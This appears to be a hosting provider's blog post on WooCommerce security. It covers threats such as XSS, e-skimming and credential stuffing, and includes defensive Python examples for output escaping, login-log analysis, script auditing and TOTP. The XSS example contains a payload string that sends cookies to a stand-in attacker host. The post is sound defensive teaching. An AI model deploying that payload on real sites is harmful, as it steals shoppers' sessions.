E-commerce security: the 9 most effective practices for building robust web sites

Nov 4, 2024
Security requirements and best practices for WooCommerce


If you own a website, and specifically an e-commerce website, you are responsible for ensuring that transactions take place securely and that the personal data of your customers and users is not stolen. Your WordPress database holds private information such as postal and email addresses, order and transaction histories and, if you store card data yourself rather than delegating it to a payment gateway, credit card details; you are responsible for the security and integrity of all of it. (In practice a store should never hold raw card numbers: let the payment gateway handle them, which also keeps most of the PCI DSS burden off your site.)

Under data protection law, the data controller is the party that decides the purposes for which, and the means by which, personal data is processed. If your organization or company decides why and how personal data is processed, it is the data controller; the employees who process that data do so on your behalf, to fulfil your duties as controller.

A single security flaw in a website can put the whole company at risk. Who would entrust their credit card details to a site that is not secured? And what would it do to your reputation if your customers' data were stolen and used for illicit purposes?

13 significant security concerns for e-commerce websites

According to the 2020 Trustwave Global Security Report, retail, covering both traditional brick-and-mortar retailers and e-commerce environments, was the sector most exposed to cybersecurity threats, accounting for about 24% of the security incidents investigated in 2019.

That is why we should look at the importance of security for e-commerce sites, identify the threats that could affect an online business, and see which measures e-commerce site administrators must adopt to protect their customers' transactions and data.

To understand the actions and practices an online business owner needs to follow to safeguard their site and store, we must first be aware of the biggest security threats e-commerce sites face.

Based on the OWASP Top 10 Web Application Security Risks, we compiled this non-exhaustive checklist of the main threats e-commerce websites face today.

OWASP Top Ten for 2021 compared to 2017 (Image source: OWASP)

1. Malware and Ransomware

Take a Look at Our Video Guide on Malware

2. Phishing

Diagram of a phishing attack (Image source: Cloudflare)

Phishing is an attempt to steal sensitive data such as usernames, passwords and credit card numbers, and any other valuable data the attacker can use or sell. Most of the time the attack arrives through spam or other fraudulent emails, or through instant messages, that impersonate a party the victim trusts and lead to a look-alike login page.

Google's phishing warning page (Image source: FixMyWP)

3. DDoS attacks

My dashboard analytics showing resource consumption

4. SQL injection

Illustration of a SQL injection attack (Image source: Cloudflare)

5. Cross-site scripting

Cross-site scripting (XSS) is an attack in which someone injects malicious code, usually JavaScript, into a website so that it runs whenever a page is loaded. The code executes in the browser of every visitor who views the affected page, with that visitor's session, and is typically designed to steal sensitive information such as session cookies or the card details typed into a form.

What happens when a cross-site scripting attack succeeds (Image source: Cloudflare)
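To make the output-escaping point concrete, the following added example (not code from this article or from WordPress; Python stands in for the PHP template) renders a constructed product review three ways. The "half safe" version shows the mistake practitioners actually make: escaping angle brackets but not quotes, which leaves attribute context exploitable. WordPress ships `esc_html()` and `esc_attr()` for precisely these two contexts.

```python
from html import escape

# Constructed attacker-controlled input, e.g. a product review submitted by a shopper.
MALICIOUS_BODY = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
MALICIOUS_TITLE = '" onmouseover="alert(1)'


def render_review_vulnerable(title, body):
    # Untrusted input interpolated straight into the page: the script runs in
    # the browser of every shopper who views the product page.
    return f'<div class="review" title="{title}">{body}</div>'


def render_review_half_safe(title, body):
    # Common mistake: escaping angle brackets but not quotes. The body is now
    # inert, but the title can still close the attribute and add an event handler.
    return (f'<div class="review" title="{escape(title, quote=False)}">'
            f'{escape(body, quote=False)}</div>')


def render_review_safe(title, body):
    # escape() with quote=True (the default) neutralises <, >, &, " and ', so
    # input cannot break out of either the attribute or the element body. This
    # mirrors WordPress's esc_attr() for the attribute and esc_html() for the body.
    return f'<div class="review" title="{escape(title)}">{escape(body)}</div>'


def contains_active_content(html):
    # Crude detector used to compare the three renderers: a live <script> tag or
    # an event-handler attribute that survived rendering.
    lowered = html.lower()
    return "<script" in lowered or '" onmouseover="' in lowered
```

Escaping must be applied at output time and chosen for the context the value lands in (element body, attribute, URL, JavaScript); a single "sanitise on input" pass cannot know which of those it will be.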

6. Man-in-the-middle attacks

A man-in-the-middle (MitM) attack, also known as an on-path attack, is a type of cyberattack in which someone positions themselves between two parties (such as a web browser and a web server) in order to read or alter the traffic and/or impersonate one of the parties, with malicious intent. Serving every page over properly validated TLS, not only the checkout, is the basic defence.

7. Credential stuffing

How credential stuffing works (Image source: Cloudflare)

8. Zero-day exploits

How attackers carry out a zero-day attack (Image source: Norton)

9. E-skimming

E-skimming or digital skimming is the insertion of malicious code, typically JavaScript on the checkout page, into a store's website in order to capture payment details as customers type them in. These are also known as Magecart attacks, after the group that popularised them.

Diagram of how a Magecart attack operates (Image source: Sucuri)

10. Brute-force attacks

A brute-force attack is a trial-and-error method of guessing secrets such as login passwords, API keys and SSH credentials. Once a password is compromised it can be used to open other services if you reuse the same credentials across multiple sites (see credential stuffing above).
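Brute force and credential stuffing look different in the logs, and telling them apart decides the response (lock the one account, or warn many users). The following added example (not code from this article or any plugin) runs detection logic over constructed login-audit lines; the line format is an assumption for the example, since WordPress core does not log failed logins itself, so a security plugin or the web server log would be the real source. It serves both the credential stuffing and brute force sections above, and emits the nginx `deny` lines you would use to block the offending sources.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed login-audit lines (format assumed for this example).
LOG_LINES = [
    "2024-11-04T10:00:01Z ip=192.0.2.10 user=alice result=fail",
    "2024-11-04T10:00:09Z ip=192.0.2.10 user=alice result=fail",
    "2024-11-04T10:00:20Z ip=192.0.2.10 user=alice result=ok",
    "2024-11-04T10:01:00Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:01:02Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:01:04Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:01:06Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:01:08Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:01:10Z ip=203.0.113.5 user=admin result=fail",
    "2024-11-04T10:02:00Z ip=198.51.100.7 user=alice result=fail",
    "2024-11-04T10:02:01Z ip=198.51.100.7 user=bob result=fail",
    "2024-11-04T10:02:02Z ip=198.51.100.7 user=carol result=fail",
    "2024-11-04T10:02:03Z ip=198.51.100.7 user=dave result=fail",
    "2024-11-04T10:02:04Z ip=198.51.100.7 user=erin result=fail",
    "2024-11-04T10:02:05Z ip=198.51.100.7 user=frank result=ok",
    "garbage line that does not match the format",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$")


def parse(lines):
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["ip"], m["user"], m["result"]


def classify_sources(lines, window=timedelta(minutes=5), fail_threshold=5):
    """Return {ip: 'brute_force' | 'credential_stuffing'} for IPs that reach
    fail_threshold failed logins inside a sliding window. Many failures against
    one account is brute force; failures spread across many accounts, each
    tried once or twice, is the credential-stuffing pattern."""
    fails = defaultdict(list)  # ip -> [(ts, user), ...] in time order
    verdict = {}
    for ts, ip, user, result in sorted(parse(lines)):
        if result != "fail":
            continue
        fails[ip].append((ts, user))
        recent = [(t, u) for t, u in fails[ip] if ts - t <= window]
        if len(recent) >= fail_threshold:
            distinct_users = len({u for _, u in recent})
            verdict[ip] = ("credential_stuffing" if distinct_users * 2 > len(recent)
                           else "brute_force")
    return verdict


def nginx_deny_block(verdict):
    # deny directives for the flagged IPs, ready to paste into an nginx server
    # block or to hand to the hosting dashboard's IP deny tool.
    return "\n".join(f"deny {ip};" for ip in sorted(verdict))
```

The legitimate user who mistypes twice and then succeeds is never flagged, which is the false-positive case any such rule must handle. In production you would feed the same logic from a log tail and key stuffing detection on the distinct-user ratio rather than on raw volume, because stuffing traffic is often spread across many source IPs with only a few attempts each.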

11. Backdoors

A backdoor lets an attacker bypass authentication or encryption and log in at will to a site, device or service. Once a site has been breached, an attacker will typically plant their own backdoors (for example a hidden administrator account or a rogue PHP file) so that they keep access to your site, can steal data, and can potentially destroy the whole site even after the original entry point has been fixed.

12. Social Engineering attacks

Social engineering attacks are particularly risky because they target traits of human nature: trust in others, lack of knowledge, reluctance to disobey an order, helpfulness, and so on. Social engineering is the psychological manipulation of people into revealing private information such as account names, passwords and financial details.

Take a look at our video guide to understanding CSRF attacks.

13. Supply chain attacks

In a typical supply chain attack, the attacker inserts malicious code into a supplier's software, which is then distributed to every customer through a legitimate update. For a WordPress store the supplier is usually a plugin or theme vendor, or a third-party script loaded from a CDN, so the update channel and every external script on the checkout page are part of your attack surface.
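Both the e-skimming section (9) and this one come down to the same question: which script bytes is the checkout page actually executing, and did anyone vet them? The following added example (not code from this article or from any vendor) audits a constructed checkout page for scripts from unapproved origins and for approved third-party scripts lacking a Subresource Integrity attribute, and shows how the integrity value is computed and verified. The hostnames, the library body and the page are all constructed for the example.

```python
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = {"shop.example"}                # assumed: the store's own host
ALLOWED_THIRD_PARTY = {"cdn.paylib.example"}  # assumed: the payment library CDN you vetted

# Constructed body of the vetted library, used to compute its integrity value.
LIB_BODY = b"window.paylib = { tokenize: function (card) { return 'tok_' + card.slice(-4); } };"


def sri_hash(body, algo="sha384"):
    # Subresource Integrity value: "<algo>-<base64 digest>" of the exact script bytes.
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


def verify_integrity(integrity_value, body):
    # What the browser does before executing a script that carries integrity=...
    algo = integrity_value.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(body, algo), integrity_value)


LIB_HASH = sri_hash(LIB_BODY)

# Constructed checkout page: one first-party script, the vetted library with SRI,
# a second file from the same CDN that slipped in without SRI, a script from a
# host nobody approved (the shape of a Magecart injection), and an inline script.
PAGE = f"""<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.paylib.example/v3/paylib.js" integrity="{LIB_HASH}" crossorigin="anonymous"></script>
<script src="https://cdn.paylib.example/v3/extra.js"></script>
<script src="https://static.analytics-trk.example/s.js"></script>
<script>window.__checkout = true;</script>
</head><body>checkout</body></html>"""


class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def audit_scripts(html, first_party=FIRST_PARTY, allowed_third_party=ALLOWED_THIRD_PARTY):
    """Flag scripts from unapproved origins and approved third-party scripts
    that lack an integrity attribute. Inline scripts are listed so they can be
    diffed against a known-good baseline (a CSP nonce or hash would control them)."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if src is None:
            findings.append(("inline-script", None))
            continue
        host = urlparse(src).netloc
        if host == "" or host in first_party:
            continue  # relative or first-party URL
        if host not in allowed_third_party:
            findings.append(("unknown-origin", src))
        elif "integrity" not in attrs:
            findings.append(("missing-integrity", src))
    return findings
```

Run `audit_scripts` against a saved copy of your real checkout page periodically and diff the findings: a new unknown origin or a new inline script on that page is exactly how a skimmer shows up. SRI only helps for scripts whose content is fixed; a vendor that changes the file in place without versioning will break the hash, which is a signal in itself.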

9 best practices to secure your e-commerce website

Securing a website can be difficult without the right tools and expertise, but it is not a job reserved for dedicated engineers. What matters most is knowing where your site is vulnerable and educating yourself and your staff on the best practices for protecting your e-commerce site from the most common dangers.

The task is two-fold. On the one hand, you are in charge of securing WordPress and WooCommerce: who can access the platform, which plugins are installed, the payment gateway, the authentication system, and everything related to WordPress, plugin and theme maintenance. On the other hand, you need a secure and up-to-date infrastructure, and this is where the quality of your hosting provider is crucial.

1. Choose a cutting-edge hosting infrastructure

The choice of hosting infrastructure is vital to your site's security, your brand's reputation and ultimately the growth of your business. Several types of hosting are available, and they differ considerably in the infrastructure they use and the service they offer:

  • Shared hosting
  • Dedicated hosting
  • VPS hosting
  • Cloud hosting
  • Managed WordPress hosting

If you want control over your hosting but lack the technical knowledge and/or resources, you can consider Virtual Private Server (VPS) hosting, which sits midway between shared and dedicated hosting. A VPS has drawbacks, though: it may not cope with high or fluctuating traffic, and it still shares the physical server with other tenants.

A cloud-based managed WordPress hosting service combines the benefits of both: the speed and secure infrastructure of a cloud platform and the convenience of a managed WordPress service.

Hosting infrastructure and technical stack

Google Cloud regions (Image source: Google)

Additionally, we have built a fast and secure technical stack based on Nginx, MariaDB, PHP 8.3, LXD containers and Cloudflare Enterprise integration, which adds a further layer of security including a firewall, DDoS protection and more. This stack is available to every client regardless of plan.

We use Linux containers (LXC), orchestrated with LXD, on top of Google Cloud Platform (GCP), which isolates each WordPress site in its own container. Your site shares no resources with any other site, not even other sites on your own account.

Diagram of the WordPress hosting infrastructure.

2. Use a web application firewall

A WAF is critical to your website whether you are just starting out as a blogger or are an experienced entrepreneur. For e-commerce sites it is vital, because an unprotected site is an easy catch for hackers and other malicious actors.

Without a web application firewall, attackers can quickly take control of your site, change login credentials, steal or destroy data, deface it and carry out any kind of illicit activity; in the worst case they can destroy the site completely. Your site is also more exposed to DDoS and brute-force attacks. Note that a WAF filters the traffic it recognises as malicious; it does not replace keeping your code patched or locking down the login.

Websites hosted on our platform are protected by Cloudflare's WAF.

How a web application firewall works (Image source: Cloudflare)

3. Set up an SSL certificate

SSL certificates on our platform

Cloudflare SSL certificates are provided at no cost to every client, irrespective of plan. Once the certificate is active, force HTTPS for the whole site, not just the checkout, so that login cookies and card details are never sent in the clear.

Check out our video how-to guide on choosing the right SSL certificate to protect your site.

4. Use secure SFTP and SSH connections

Setting the SFTP protocol in FileZilla

Our platform only supports SFTP/SSH connections. Plain FTP, which sends your credentials and files unencrypted, is not available, since SFTP is the more secure technique.

Your SFTP/SSH details are available in the My dashboard under WordPress Sites > Sitename > Environment > Info.

SFTP environment credentials in My

5. Make sure you are using supported versions of PHP

Each PHP release branch is actively supported for two years, after which it receives security fixes only for a limited period. Only supported versions receive security and performance fixes, so running an unsupported PHP version both slows your site down and increases the likelihood of unpatched security vulnerabilities.

As of August 2024, the officially supported PHP versions are 8.1, 8.2 and 8.3.

Supported PHP versions (Source: PHP.net)

At the time of writing, PHP versions prior to 8.1 no longer receive security updates. If you are running PHP 8.0 or earlier you are exposed to security flaws that will never be corrected.

Only supported PHP versions are allowed

It may take additional development effort if you use specific plugins that are not compatible with supported PHP versions. However, our main responsibility is to ensure the security of your websites and of our whole infrastructure, and for this reason we do not allow users to run unsupported PHP versions.

You can change the PHP version of your WordPress site in My: open the site, select Tools from the left-hand menu, scroll to the bottom of the page to the PHP engine section, click Modify and choose the PHP version appropriate for your site.

Modify the PHP engine in My

6. Enable two-factor authentication

Strong passwords for your website and hosting account may not be enough to safeguard your e-commerce site. Using multi-factor authentication is strongly recommended.

Multi-factor authentication is an authentication scheme in which the user logging in to a service must present two or more pieces of evidence of identity. These can be of different kinds: a fingerprint, an authenticator app, an email, an SMS, a hardware token, and so on.

Enable 2FA in My

In addition to a strong password for My, we recommend enabling two-factor authentication, and asking every user in your company to do the same. With 2FA enabled, logging in to My requires an additional verification code generated by an authenticator app (e.g. Google Authenticator) on your phone or by a password manager.

To activate 2FA in My, click on your name in the top right corner and select User Settings. In My account, scroll down to the Two-factor authentication section, click the toggle, scan the QR code with your authenticator app, enter the six-digit code shown in the app and click the button to complete the setup.

Two-factor authentication in My

Note that My no longer supports SMS-based 2FA, because it is vulnerable to phone-based attacks and is less secure than a time-based token. A recent security breach at Authy exposed 33 million customer phone numbers, which increased the risk of SMS fraud and SIM swapping.

My no longer supports SMS authentication
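The "six-digit code from an authenticator app" is a time-based one-time password (RFC 6238), and understanding why it beats SMS is easier with the algorithm in front of you. The following is an added example, not the My platform's code or any plugin's: it derives the code from a shared secret and the clock, verifies it the way a server should, and builds the otpauth URI that a setup QR code encodes. It uses the test secret from RFC 6238 appendix B so the outputs can be checked against the published vectors; the issuer and account names are placeholders.

```python
import base64
import hmac
import struct
import time


def hotp(secret, counter, digits=6, algo="sha1"):
    # RFC 4226: HMAC over the 8-byte big-endian counter, dynamic truncation,
    # then the low `digits` decimal digits, zero-padded.
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at=None, step=30, digits=6):
    # RFC 6238: HOTP with the counter derived from the clock. The code depends
    # only on the shared secret and the current 30-second window, not on a
    # phone number that an attacker could take over with a SIM swap.
    t = int(time.time() if at is None else at)
    return hotp(secret, t // step, digits)


def verify_totp(secret, code, at=None, step=30, skew=1):
    # Server-side check: accept the current window plus `skew` neighbours on
    # either side to tolerate clock drift, comparing in constant time. A real
    # deployment must also rate-limit attempts and refuse a code that was
    # already used in its window.
    t = int(time.time() if at is None else at)
    return any(
        hmac.compare_digest(hotp(secret, t // step + delta), code)
        for delta in range(-skew, skew + 1)
    )


def provisioning_uri(secret, account, issuer):
    # The otpauth:// URI that the QR code on a 2FA setup screen encodes; the
    # authenticator app reads the Base32 secret from it. Account and issuer are
    # inserted verbatim here, so keep them to URL-safe characters.
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return f"otpauth://totp/{issuer}:{account}?secret={b32}&issuer={issuer}&digits=6&period=30"


# Test secret from RFC 6238 appendix B (ASCII "12345678901234567890").
RFC6238_SECRET = b"12345678901234567890"
```

The secret is the whole security of the scheme: it must be generated from a CSPRNG, shown to the user only once during enrolment, and stored encrypted at rest. Because the code is derived from time rather than delivered over the phone network, nothing about it transits SMS, which is the property that makes it preferable to the SMS factor the platform dropped.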

Set up 2FA in WordPress

You can also enable two-factor authentication on your e-commerce site itself. WordPress does not offer 2FA out of the box, but you can add it quickly and easily with any of the plugins listed below:

7. Keep WordPress, plugins and themes up to date

In addition to the regular core releases, WordPress publishes security releases whenever a new vulnerability is identified. The same goes for themes and plugins.

To keep your WordPress site protected, keep the whole site up to date, core, themes and plugins, so that known vulnerabilities are closed as soon as a fix is released.

You can also manage automatic updates for plugins and themes from the WordPress admin.

Enable/disable automatic plugin updates

If you prefer to disable this option and carry out updates yourself, be aware that updating many websites by hand is an arduous and tedious process. Many agencies turn to third-party software that lets them manage updates for all of their WordPress sites from a single external dashboard.

Our customers do not need to buy a third-party service for this, because they can use the bulk update feature in the My dashboard.

WordPress updates in My

Update plugins in bulk in My

When you run an update through My, the system creates a backup first, so you can roll back within two hours if the update fails. This gives you a safety net whenever you upgrade themes or plugins.

A system-generated backup is created when you bulk update your plugins.

You can also run bulk updates across many WordPress sites at once. In the My dashboard, go to WordPress Sites, select some or all of your sites, click the Actions button on the right and choose the action you want to perform. If you are updating plugins, click the corresponding menu option; a pop-up lists the plugins for which an update is available.

Select the plugins you want to update and wait a couple of minutes. The pop-up notifies you when the update has completed successfully.

If an update fails, go to Sitename > Backups > System-generated in My and restore the latest backup.

System-generated backups in the My dashboard

On our platform you can update themes and plugins on all your WordPress sites from a single page, at no cost: ideal for agencies managing many sites from one place.

8. Backups

A web host that truly cares about the e-commerce sites it hosts should provide regular WordPress backups. We provide six kinds of backup.

We provide daily automatic WordPress backups and system-generated backups for every WordPress site. These, along with manual backups, are available as restore points in My. You can also create a downloadable backup once a week. A backup is only worth what it restores, so test restoring one to a staging environment periodically rather than assuming the archive is usable.

Daily backups in My
Restoring a backup to a staging environment in My
Hourly backups in My
You can enable six-hourly and daily backups in My
External backups in My
Integration with Amazon S3 and Google Cloud Storage for external backups

9. Be careful with plugins

You often need many plugins on a WordPress site, and this is especially true for e-commerce, which usually requires features not included in WordPress or WooCommerce out of the box. We have a long list of recommended plugins you can browse:

Do not simply install the first plugin that comes up in a search. Follow a few best practices when choosing the plugins for your WooCommerce site:

Choose plugins that receive regular updates from vendors with a good reputation. Trust the community: check reviews and ratings from other users. Avoid, where possible, plugins that are poorly rated or maintained by unknown vendors.

Technical details of the WooCommerce plugin

Always test a plugin in a staging environment before deploying it to production. This catches compatibility issues with other plugins or with WordPress core before they affect customers.

Always back up your site before installing a plugin on production.

Do not install plugins you do not need, or plugins that offer functions you will not use. Every plugin is extra code that may introduce security vulnerabilities, conflict with other plugins or slow the site down.

Check whether the plugin has any known vulnerabilities, using a service such as the WPScan WordPress vulnerability database.

So how do web hosts help with theme and plugin vulnerabilities?

Security alerts

If a security flaw is discovered in one of your sites, whether in WordPress core, a plugin or a theme, you are immediately notified in My and by email, with suggestions for fixing the issue.

Our clients value this feature because it lets them act quickly on security issues detected on their sites. If you are a client, sooner or later you will probably receive an email like this one:

Notification email about a vulnerability in WooCommerce

WordPress-specific dangers and the best way to avoid them

In the first section of this article we listed some of the major security threats affecting e-commerce websites in general. Some of them are particularly serious for WordPress/WooCommerce sites.

Although WordPress is open-source software, it is worth pointing out that most successful attacks on WordPress sites do not exploit inherent vulnerabilities in the CMS itself, but weaknesses that could have been anticipated and fixed before the incident.

Failing to update core, plugins and themes leaves your e-commerce site just as exposed as using weak passwords or having no strict site access policy.

Here is a quick list of threats and the strategies that stop them, to help keep your site secure:

Additional features to enhance your website security

We aim to provide the fastest and most secure WordPress hosting platform in the world, and we are always looking for ways to improve the security of your e-commerce site so it can offer your users and customers the best possible shopping experience. Here are some of our services and features aimed specifically at securing your WordPress/WooCommerce site.

Uptime checks

If your website does not respond or is slow, how can you be sure it is down for all users and not just for you?

We check your website every 3 minutes: that is 480 checks a day.

If your website is down, our engineers start working on it immediately, and there is a good chance the issue will be fixed before you even notice it.

Take a look at our video guide on how to check if a website is down:

Our security pledge

Sometimes, despite all your efforts, your site may still be compromised. What then?

Our customers do not need to worry about this: if a WordPress site hosted with us is compromised, we help the site owner investigate and repair the damage at no charge.

Our security pledge includes:

  • An inspection of the site and a thorough analysis of its files to find malware.
  • Repair of the WordPress core using a clean copy of the core files.
  • Detection and removal of infected plugins and themes.

IP blocking

Sometimes it is necessary to block an IP address or range to stop malicious activity from bots, spammers or other actors. In general you can block IP addresses in your server's configuration files (for example with the deny directive in nginx), or, on our platform, from the dashboard.

To inspect client IP addresses and the number of requests they make, log in to My and go to WordPress Sites > Sitename > Analytics > Geo & IP.

Top client IPs in My
Add IP addresses to the IP Deny tool in My

Once you have blocked an IP address, it is listed on the same page.

Adding an IP address to the deny list in My

Security certifications

Our commitment to the security of our clients' websites is verified and certified at several levels.

The five trust services criteria (the basis of a SOC 2 report) are:

  • Security
  • Availability
  • Processing integrity
  • Confidentiality
  • Privacy

Together they give an online store owner assurance of security and stability, so they can rely on the hosting service and devote their time to the business.

ISO/IEC 27001 is the world's most widely-known standard for information security management systems. An ISMS implemented according to the standard "is an instrument for risk management, cyber-resilience, and operational efficiency."

Conformity with ISO/IEC 27001 means that the company has implemented a system for managing the risks to the security of the data it owns or processes, and that this system follows the principles and best practice set out in the standard.

ISO/IEC 27017:2015 gives guidelines for information security controls applicable to the provision and use of cloud services. It provides:

  • additional implementation guidance for the relevant controls specified in ISO/IEC 27002;
  • additional controls and implementation guidance that relate specifically to cloud services.

Finally, ISO/IEC 27018:2019 establishes commonly accepted control objectives, controls and guidelines for implementing measures to protect Personally Identifiable Information (PII) in line with the privacy principles of ISO/IEC 29100 for the public cloud computing environment.

You can visit our Trust Center for more information on our ongoing compliance initiatives.

Summary

There is a lot to do to build an e-commerce site. Doing it all yourself requires technical expertise that smaller companies and start-ups may not have.

But a business owner who wants to launch an online store and take on the challenges of international markets should not give up the growth opportunities that e-commerce offers. That is where enterprise-level managed WordPress and WooCommerce hosting helps.

Through these security measures we lock down your e-commerce site and reduce the risk of data breaches and downtime.

Now it is your turn. What dangers and vulnerabilities do you deal with every day? Does your hosting provider give your e-commerce site enough protection from malicious actors? Share your experience in the comments below.

Carlo Daniele

Carlo is passionate about front-end development and web design. He has been tinkering with WordPress for over twenty years and also collaborates with Italian and European universities and educational institutions. He has written a number of articles and guides about WordPress, published on Italian and international websites as well as in print magazines. He is on LinkedIn.